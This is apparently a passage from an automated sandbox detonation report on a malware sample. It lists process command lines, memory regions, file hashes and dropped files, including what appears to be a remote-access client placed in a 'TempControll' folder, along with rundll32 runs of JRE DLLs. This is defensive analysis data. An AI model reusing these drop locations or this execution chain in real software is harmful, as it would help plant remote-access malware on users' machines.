--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=299A91C9F9ECD525CC4DBC58E58975A9 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D86844620FECBE686E79171D2482E499 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D8CBFF90D2EC00165F884839663695C7 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --renderer-client-id=6 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=105BE7FF81EF69CC890FA6834CAC8A6D --mojo-platform-channel-handle=2692 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Files

memory/1292-0-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2052-3-0x0000000003170000-0x0000000003198000-memory.dmp

memory/2052-10-0x00000000031B8000-0x00000000031C0000-memory.dmp

memory/2052-13-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2052-34-0x0000000003218000-0x0000000003220000-memory.dmp

memory/2052-33-0x0000000003208000-0x0000000003210000-memory.dmp

memory/2052-32-0x00000000031B0000-0x00000000031B8000-memory.dmp

memory/2052-31-0x00000000031A8000-0x00000000031B0000-memory.dmp

memory/2052-30-0x0000000003210000-0x0000000003218000-memory.dmp

memory/2052-36-0x0000000003220000-0x0000000003228000-memory.dmp

memory/2052-38-0x0000000003228000-0x0000000003230000-memory.dmp

memory/2052-43-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-42-0x0000000003238000-0x0000000003240000-memory.dmp

memory/2052-41-0x0000000003230000-0x0000000003238000-memory.dmp

memory/2052-46-0x0000000003240000-0x0000000003248000-memory.dmp

memory/2052-50-0x0000000003248000-0x0000000003250000-memory.dmp

memory/2052-49-0x0000000003170000-0x0000000003198000-memory.dmp

memory/2052-54-0x0000000003250000-0x0000000003258000-memory.dmp

memory/2052-53-0x00000000031B8000-0x00000000031C0000-memory.dmp

memory/2052-57-0x00000000031C0000-0x00000000031C8000-memory.dmp

memory/2052-58-0x0000000003258000-0x0000000003260000-memory.dmp

memory/2052-61-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-65-0x0000000003260000-0x0000000003268000-memory.dmp

memory/2052-64-0x0000000003218000-0x0000000003220000-memory.dmp

memory/2052-63-0x00000000031A8000-0x00000000031B0000-memory.dmp

memory/2052-62-0x0000000003210000-0x0000000003218000-memory.dmp

memory/2052-67-0x0000000003268000-0x0000000003270000-memory.dmp

memory/2052-71-0x0000000003270000-0x0000000003278000-memory.dmp

memory/2052-70-0x0000000003220000-0x0000000003228000-memory.dmp

memory/2052-76-0x0000000003278000-0x0000000003280000-memory.dmp

memory/2052-75-0x0000000003230000-0x0000000003238000-memory.dmp

memory/2052-74-0x0000000003228000-0x0000000003230000-memory.dmp

memory/2052-82-0x0000000003280000-0x0000000003288000-memory.dmp

memory/2052-86-0x0000000003288000-0x0000000003290000-memory.dmp

memory/2052-85-0x0000000003238000-0x0000000003240000-memory.dmp

memory/2052-89-0x0000000003240000-0x0000000003248000-memory.dmp

memory/2052-90-0x0000000003290000-0x0000000003298000-memory.dmp

memory/2052-94-0x0000000003298000-0x00000000032A0000-memory.dmp

memory/2052-93-0x0000000003248000-0x0000000003250000-memory.dmp

memory/2052-96-0x0000000003250000-0x0000000003258000-memory.dmp

memory/2052-97-0x00000000032A0000-0x00000000032A8000-memory.dmp

memory/2052-102-0x00000000032A8000-0x00000000032B0000-memory.dmp

memory/2052-101-0x0000000003258000-0x0000000003260000-memory.dmp

memory/2052-105-0x00000000032B0000-0x00000000032B8000-memory.dmp

memory/2052-104-0x0000000003260000-0x0000000003268000-memory.dmp

memory/2052-108-0x00000000032B8000-0x00000000032C0000-memory.dmp

memory/2052-107-0x0000000003268000-0x0000000003270000-memory.dmp

memory/2052-112-0x00000000032C0000-0x00000000032C8000-memory.dmp

memory/2052-111-0x0000000003270000-0x0000000003278000-memory.dmp

memory/2052-115-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-119-0x00000000032C8000-0x00000000032D0000-memory.dmp

memory/2052-118-0x0000000003278000-0x0000000003280000-memory.dmp

memory/2052-122-0x00000000032D0000-0x00000000032D8000-memory.dmp

memory/2052-121-0x0000000003280000-0x0000000003288000-memory.dmp

memory/2052-123-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-126-0x00000000032D8000-0x00000000032E0000-memory.dmp

memory/2052-125-0x0000000003288000-0x0000000003290000-memory.dmp

memory/2052-130-0x00000000032E0000-0x00000000032E8000-memory.dmp

memory/2052-129-0x0000000003290000-0x0000000003298000-memory.dmp

memory/2052-136-0x00000000032A0000-0x00000000032A8000-memory.dmp

memory/2052-135-0x00000000032E8000-0x00000000032F0000-memory.dmp

memory/2052-134-0x00000000032F0000-0x00000000032F8000-memory.dmp

memory/2052-133-0x0000000003298000-0x00000000032A0000-memory.dmp

memory/2052-143-0x00000000032B0000-0x00000000032B8000-memory.dmp

memory/2052-142-0x0000000003300000-0x0000000003308000-memory.dmp

memory/2052-141-0x00000000032F8000-0x0000000003300000-memory.dmp

memory/2052-140-0x00000000032A8000-0x00000000032B0000-memory.dmp

memory/2052-147-0x0000000003308000-0x0000000003310000-memory.dmp

memory/2052-146-0x00000000032B8000-0x00000000032C0000-memory.dmp

memory/2052-150-0x0000000003310000-0x0000000003318000-memory.dmp

memory/2052-149-0x00000000032C0000-0x00000000032C8000-memory.dmp

memory/2052-152-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-155-0x0000000003318000-0x0000000003320000-memory.dmp

memory/2052-153-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-154-0x00000000032C8000-0x00000000032D0000-memory.dmp

memory/2052-157-0x00000000032D0000-0x00000000032D8000-memory.dmp

memory/2052-158-0x0000000003320000-0x0000000003328000-memory.dmp

memory/2052-163-0x0000000003328000-0x0000000003330000-memory.dmp

memory/2052-162-0x00000000032D8000-0x00000000032E0000-memory.dmp

memory/2052-169-0x0000000003330000-0x0000000003338000-memory.dmp

memory/2052-168-0x00000000032E0000-0x00000000032E8000-memory.dmp

memory/2052-174-0x0000000003338000-0x0000000003340000-memory.dmp

memory/2052-173-0x00000000032E8000-0x00000000032F0000-memory.dmp

memory/2052-172-0x00000000032F0000-0x00000000032F8000-memory.dmp

memory/2052-176-0x0000000003340000-0x0000000003348000-memory.dmp

memory/2052-179-0x0000000003300000-0x0000000003308000-memory.dmp

memory/2052-180-0x0000000003348000-0x0000000003350000-memory.dmp

memory/2052-178-0x00000000032F8000-0x0000000003300000-memory.dmp

memory/2052-182-0x0000000003350000-0x0000000003358000-memory.dmp

memory/2052-185-0x0000000003308000-0x0000000003310000-memory.dmp

memory/2052-186-0x0000000003358000-0x0000000003360000-memory.dmp

memory/2052-189-0x0000000003360000-0x0000000003368000-memory.dmp

memory/2052-188-0x0000000003310000-0x0000000003318000-memory.dmp

memory/2052-192-0x0000000003368000-0x0000000003370000-memory.dmp

memory/2052-191-0x0000000003318000-0x0000000003320000-memory.dmp

memory/2052-195-0x0000000003370000-0x0000000003378000-memory.dmp

memory/2052-194-0x0000000003320000-0x0000000003328000-memory.dmp

memory/2052-198-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-201-0x0000000003328000-0x0000000003330000-memory.dmp

memory/2052-204-0x0000000003330000-0x0000000003338000-memory.dmp

memory/2052-205-0x0000000003338000-0x0000000003340000-memory.dmp

memory/2052-207-0x0000000003340000-0x0000000003348000-memory.dmp

memory/1424-221-0x00000000049C0000-0x00000000049F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe

MD5 e634616d3b445fc1cd55ee79cf5326ea
SHA1 ca27a368d87bc776884322ca996f3b24e20645f4
SHA256 1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937
SHA512 7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlccore.dll

MD5 5bdff9dac8efdfedd169125e415a4111
SHA1 51bca77b201aa86b53735290c91bf4180cefe28e
SHA256 d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd
SHA512 12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlc.dll

MD5 4b262612db64f26ea1168ca569811110
SHA1 8e59964d1302a3109513cd4fd22c1f313e79654c
SHA256 a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f
SHA512 9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7

memory/1424-229-0x00000000050E0000-0x0000000005708000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\ulgbkv

MD5 8f37e80238556701210f07b7bbf91106
SHA1 b4593b7bd699bf461a568898e6b04f071476c8dd
SHA256 25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6
SHA512 df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\bmrrr

MD5 d78f6cce7dd76163e1af90c2287b7a04
SHA1 166e4715075b449fd6b9cde5ee06b66a2df050d2
SHA256 e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1
SHA512 741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f

memory/1376-240-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

memory/2052-243-0x0000000001610000-0x0000000001611000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qbxqo1y.exh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1376-263-0x00007FF7B4780000-0x00007FF7B4878000-memory.dmp

memory/1376-264-0x00007FFA0DCF0000-0x00007FFA0DD24000-memory.dmp

memory/1376-265-0x00007FF9FEE80000-0x00007FF9FF135000-memory.dmp

memory/4528-274-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf

MD5 acfffe6de49ab6bbcb590e95d558111b
SHA1 51d7b4a4ef2851f4787805bd2eebc61f9f62ae34
SHA256 fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217
SHA512 94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

memory/2052-279-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-283-0x0000000001610000-0x0000000001611000-memory.dmp

memory/2052-284-0x0000000001610000-0x0000000001611000-memory.dmp

memory/4528-385-0x00007FF669D00000-0x00007FF669DF8000-memory.dmp

memory/4528-387-0x00007FF9FE850000-0x00007FF9FEB05000-memory.dmp

memory/4528-386-0x00007FFA0DA60000-0x00007FFA0DA94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\78e2ff5b

MD5 a5d846508854a7780fdfa5d6e3b4bec6
SHA1 2d39b673bd582973e7bd61f00b1b9ec00c420abf
SHA256 41c0d14d578a4b2ae282488a341e1aff4b2d514169b221616e0255fbfe5fe8a0
SHA512 638bccded205a48b149c62a2cd3a415f1ac502bb1f1cb68c129db9b402ce6bce5b5d77a01e77dd0d520d42c891fa3a58beca5836906f4787eef63d490deedfc5

memory/4528-382-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

memory/3624-395-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

MD5 290c26b1579fd3e48d60181a2d22a287
SHA1 e4c91a7f161783c68cf67250206047f23bd25a29
SHA256 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

C:\Users\Admin\AppData\Roaming\TempControll\PCICL32.dll

MD5 d16ffa06a35601a73b73836bf905ed19
SHA1 b8231d36f921e5b75b592ea3374f19216a5c411f
SHA256 80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab
SHA512 e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

C:\Users\Admin\AppData\Roaming\TempControll\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\TempControll\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\TempControll\PCICHEK.DLL

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\TempControll\client32.ini

MD5 0cdedc9a0a1ee8c9f7ca140e543f2f1c
SHA1 2540f9e3c63b6174a60324b137ffb5697c1a7df8
SHA256 3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6
SHA512 068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

C:\Users\Admin\AppData\Roaming\TempControll\NSM.LIC

MD5 12b8cc1d0a34012bbbbe86880333c567
SHA1 e89659c412af82e31e6d14c34e47d7cc4c5ec9a5
SHA256 9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f
SHA512 eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

C:\Users\Admin\AppData\Roaming\TempControll\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 680407510c90ee4993405cc21a3a9e60
SHA1 befa482c34419dd4ed26a3e5467720143752a998
SHA256 1e55c92eca80e75e31ae4f09309267619014894229a4a3191ca74d4962cafff0
SHA512 b856c6d2c105f66e6bf9f42208b5a3f685899bfd379cafc9d9212ee6f87819e04a7593db8c3d25601b009b9d647c729df023ac4e239d09e8eb77d24eb9cf2d8c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a12e9f958f6a2179ef9314b84678ffe1
SHA1 1abd9a2f8bd5df0f44fa227f1b39d85820882315
SHA256 9db7a2644d7c88acccf747f15f10f06a618c1691ed82fa6846f725a2a77e8ffe
SHA512 99e8cef0f508226a90db3434daa98a028c3ba71a70223095ffd4f13edb3e064fd9cf611c9d7146f573c0f92dde23df31309155836ed35b10a13ab031b909e6f2

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

memory/3624-595-0x0000000065300000-0x000000006547B000-memory.dmp

memory/4536-598-0x00007FFA1CA90000-0x00007FFA1CC85000-memory.dmp

memory/4536-599-0x0000000000FB0000-0x0000000001015000-memory.dmp

memory/1652-601-0x0000000009B00000-0x0000000009C4D000-memory.dmp

memory/4536-602-0x0000000000FB0000-0x0000000001015000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

89s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 792 wrote to memory of 4944 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4944 -ip 4944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 600

Network

Country Destination Domain Proto

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

131s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\jre\asm-all.jar

Network

N/A

Files

memory/1192-2-0x0000000002590000-0x0000000002800000-memory.dmp

memory/1192-10-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1192-11-0x0000000002590000-0x0000000002800000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

118s

Max time network

124s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1624 wrote to memory of 1780 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge-32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

133s

Max time network

156s

Command Line

